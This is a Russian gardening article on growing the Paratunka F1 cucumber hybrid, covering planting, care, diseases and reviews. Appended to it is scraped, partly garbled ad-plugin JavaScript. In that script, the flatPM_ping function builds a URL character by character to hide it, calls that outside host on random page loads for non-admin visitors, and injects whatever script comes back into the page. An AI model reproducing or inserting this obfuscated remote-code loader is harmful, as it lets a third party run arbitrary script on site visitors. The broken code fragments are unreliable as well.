Листья густые, светло-зеленого или темного цвета, средние по размеру. Опыление гибриду не требуется, он партенокарпический, то есть на кустах вырастают цветки только женского типа.

Паратунка — раннеспелый гибрид. Первые плоды собирают уже приблизительно через месяц после всходов. Плодоношение продолжается до первых заморозков, практически весь сезон.

Плоды вырастают длиной около 9 см, диаметром до 3 см. Цвет кожицы огурцов темно-зеленый, масса огурца в среднем 100 г. Плоды имеют немногочисленные бугорки и ярко выраженные шипы, обладают характерным огуречным ароматом, мякоть хрустящая. Вкус этих огурчиков отличается сладковатым оттенком.

Урожайность при правильном уходе — 15–17 кг на 1 кв. м.

Как вырастить самостоятельно

Гибрид Паратунка несложно вырастить даже неопытному огороднику — с помощью семян или через рассаду.

Другие гибриды для вашего участка:

Посадка семенным и рассадным способом

Посадка и уход за гибридом Паратунка мало чем отличаются от выращивания других сортов огурцов.

В большинстве регионов нашей страны в открытый грунт семена культуры сажают в первой декаде мая. Можно использовать как пророщенный, так и сухой посадочный материал. Для проращивания семечки достаточно обернуть влажной марлей. Уже через несколько дней появятся ростки.

На грядках расстояние между посадочными лунками должно быть не менее 25 см, между рядами – до 75 см. На 1 кв. м обычно сажают 3-4 растения.

Глубина лунок – 2 см. Перед тем, как посадить семена, следует полить землю горячей водой. Обычно в одну лунку помещают 2-3 семечка, сверху присыпают землей и слегка опрыскивают теплой отстоянной водой. Когда появятся всходы, оставляют один росток, самый жизнеспособный и крепкий, остальные при этом удаляют.

Внимание! До появления всходов грядки накрывают пленкой для создания парникового эффекта.

Грядку лучше подготовить еще с осени, удобрив грунт коровяком или куриным пометом.

По утверждению создателей гибрида Паратунка F1, первоначально он предназначался только для теплиц. Но позже выяснилось, что растение неплохо растет и в открытом грунте, при этом урожай быстрее созревает при условии высадки через рассаду.

Для получения рассады семена обеззараживают, замачивают и высаживают в отдельные пластиковые или торфяные стаканчики. Корневая система гибрида слабая, особенно верхние корешки, поэтому Паратунка плохо переносит пикировку.

В качестве грунта используют торфяные таблетки, листовой перегной и садовую почву. На дно горшочков рекомендуется поместить дренаж или опилки. Высадка в открытый грунт производится после формирования четвертого листа.

Важно! Сроки посадки не рекомендуется нарушать. Если высадить рассаду раньше, ее рост в открытом грунте надолго замедлится. Если же задержаться со сроками, кустики неестественно вытянутся и станут нежизнеспособными.

Правильно и вовремя высаженная рассада уже через несколько дней начнет расти.

Выращивание поэтапно и уход

Если семена огурцов высажены непосредственно в грунт, их так же, как и рассаду, накрывают пленкой или стеклом до появления всходов, после чего убирают.

По мере роста следует постоянно увеличивать объем полива. Поливают растения обязательно теплой водой, предпочтительно в вечернее время. В жаркие дни — каждый день, в пасмурную погоду – один раз в 2-3 дня.

Когда гибрид Паратунка начнет плодоносить, урожай собирают через день, не давая огурцам перерастать.

Внимание! Рыхлят кусты осторожно – верхняя часть корневой системы огурцов Паратунка расположена у самой поверхности, поэтому очень уязвима. Лучше всего сразу произвести мульчирование грядки или посыпать ее опилками.

В течение всего вегетационного периода, приблизительно раз в 10 дней, делают подкормки. Для этого используют настой коровяка, разбавленный с водой в пропорции 1:10.

Особенности выращивания и возможные трудности

Поскольку гибрид относится к раннеспелым, у него происходит бурный рост стебля, поэтому его рекомендуется прищипывать. При выращивании без шпалер в нескольких местах стебель присыпают землей. Гибрид Паратунка отлично укореняется таким способом, что дает больше питательных веществ растению.

Нередко происходит образование у растения пустоцветов. Это происходит при переизбытке азота. Ситуацию исправляют, внося в грунт «Нитрофоску».

Болезни и вредители

Гибрид относительно устойчив к основным болезням огурцов и вредителям. Но при неправильном уходе или неблагоприятных погодных условиях некоторые из них могут появиться:

  • мучнистая роса — возникает, если участок плохо проветривается;
  • пероноспороз, кладоспориоз, антракноз – поражают кусты в сезон затяжных дождей;
  • паутинный клещ — может объявиться в засуху;
  • трипсы и белокрылки — поражают листья.

Для борьбы используются специальные инсектицидные препараты. Приверженцы органического земледелия используют народные методы: золу, настои луковой шелухи и чеснока, йод и марганцовку.

Для профилактики болезней и вредителей соблюдайте правила:

  • периодически проветривайте укрывные конструкции;
  • обеспечьте доступ свежего воздуха к грядке, но защищайте ее от сквозняков;
  • регулярно осматривайте кусты на предмет возможных патологий;
  • периодически меняйте места посадки, соблюдая правила севооборота.

Желательно не допускать попадания на кусты прямого солнечного света длительное время — это может вызвать ожог и отмирание листьев.

Сбор и применение урожая

Урожай гибрида Паратунка собирают до конца осени. Плоды вкусны в различных салатах в свежем виде, хорошо подходят для маринования и соления благодаря малому количеству семян. Хорошая лежкость позволяет огурцам без проблем переносить длительные транспортировки.

Преимущества и недостатки

Плюсов у этих огурцов немало:

  • рано начинают плодоносить;
  • сезон сбора урожая заканчивается с первыми заморозками;
  • плодоношение непрерывное;
  • хорошо переносят длительную транспортировку;
  • растение не требует опыления насекомыми;
  • высокая устойчивость к заболеваниям;
  • высокая урожайность;
  • плоды никогда не приобретают горький привкус.

К минусам гибрида можно отнести его неспособность к размножению выращенными семенами, что характерно для всех гибридов. Есть и еще несколько факторов:

  • слабая корневая система;
  • необходимость частого полива;
  • при формировании куста требуется установка дополнительных подпорок.

В целом огурцы Паратунка имеют гораздо больше достоинств, чем недостатков, что отмечается многими огородниками.

Отзывы

Отзывы о гибриде Паратунка F1 в основном положительные. Особенно подкупает любителей огурцов длительное плодоношение и отсутствие горечи в плодах.

Валерий, г. Ростов: «С некоторых пор я увеличил площадь дачного участка и, соответственно, посевов. Решил посадить побольше огурцов. Когда встал вопрос, какой сорт выбрать, из гибридов отдал предпочтение Паратунке. Эти огурцы нашей семье понравились длительностью плодоношения и высокой урожайностью. Салат из свежих плодов готовили практически до поздней осени».

Галина, г. Новгород: «Всю жизнь выращивала обычные огурцы, к гибридам относилась с подозрением, считая их чуть ли не мутантами. Какой это огурец, если из его семян ничего путного нельзя вырастить? Сын с невесткой несколько сезонов выращивают гибрид Паратунка. И я к нему привязалась: огурчики ровные, упругие, никогда не горчат, идеально подходят для засолки. Так что теперь мое мнение о гибридах положительное».

Инна, г. Белгород: «Выращиваем с мужем огурцы на продажу. Гибрид Паратунка хорошо переносит перевозку, его охотно берут торговцы. Практически не сталкивались с болезнями, на вкус они тоже хороши: сладковатые, с хрустом».

Заключение

Паратунка относится к высокоурожайному раннеспелому типу гибридов, поэтому быстро обрел популярность. Вкус как свежих плодов, так и консервированных порадует любого гурмана. Небольшой их размер позволяет легко мариновать такие огурцы в емкостях любого размера.

Ухаживать за этими огурцами несложно — требуется только соблюдать несложные правила агротехники. Попробуйте вырастить и у себя на участке гибрид Паратунка — он будет радовать вас долгим плодоношением и большим урожаем!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};